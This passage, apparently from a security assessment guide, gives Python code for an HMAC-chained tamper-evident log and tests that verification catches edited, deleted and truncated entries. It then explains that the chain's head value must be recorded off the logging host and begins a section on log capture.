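    """Append lines to the store (a list of dicts), each chained to its predecessor."""
    prev = store[-1]["mac"] if store else GENESIS
    seq = store[-1]["seq"] + 1 if store else 0
    for line in lines:
        mac = entry_mac(key, prev, seq, line)
        store.append({"seq": seq, "line": line, "mac": mac})
        prev, seq = mac, seq + 1
    return store


def chain_head(store):
    """The newest MAC; record it somewhere the logging host cannot write."""
    return store[-1]["mac"] if store else GENESIS


def verify_chain(key, store, expected_head=None):
    """Return (ok, first_bad_seq).

    Edits, deletions, insertions and reordering break the chain at the first
    affected entry. Truncation from the tail is only caught when the expected
    head MAC was recorded out-of-band and passed in.
    """
    prev = GENESIS
    for expected_seq, entry in enumerate(store):
        if entry["seq"] != expected_seq:
            return False, expected_seq
        if not hmac.compare_digest(entry_mac(key, prev, expected_seq, entry["line"]), entry["mac"]):
            return False, expected_seq
        prev = entry["mac"]
    if expected_head is not None and not hmac.compare_digest(prev, expected_head):
        return False, len(store)
    return True, None


def tamper_scenarios(key=COLLECTOR_KEY):
    """Build a store, record its head, then apply the tampering attempts an
    assessor should expect verification to catch. Returns scenario -> (ok, seq)."""
    store = append_entries(key, [], SAMPLE_LINES)
    head = chain_head(store)
    results = {"intact": verify_chain(key, store, head)}

    edited = [dict(e) for e in store]
    edited[0]["line"] = edited[0]["line"].replace("Failed password", "Accepted password")
    results["edit_entry_0"] = verify_chain(key, edited, head)

    deleted = [dict(e) for e in store]
    del deleted[1]  # remove the firewall drop; seq 2 now sits at index 1
    results["delete_entry_1"] = verify_chain(key, deleted, head)

    truncated = [dict(e) for e in store[:-1]]  # drop the newest entry
    results["truncate_no_head"] = verify_chain(key, truncated)
    results["truncate_with_head"] = verify_chain(key, truncated, head)
    return results


if __name__ == "__main__":
    for name, (ok, seq) in tamper_scenarios().items():
        print(f"{name:20s} ok={ok} first_bad_seq={seq}")
```

The last two scenarios are the point worth checking during an assessment: a chain on its own cannot tell a truncated log from one that simply stopped, so the head MAC (or a signature over it) has to be written somewhere the logging host cannot reach, for example a daily digest sent to a separate system, and the verifier must be handed that value.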
11.3.1.3
HOW TO APPROACH LOG CAPTURE AND ANALYSIS
Logs can contain huge amounts of data. Logging and analysing everything can result in
information overload, or in slow-downs where either the systems or the people involved
cannot handle the volume of data.
As a result, it is important for system administrators to decide exactly what information
is required, so that only the required data is logged, captured and analysed. To ensure
that needed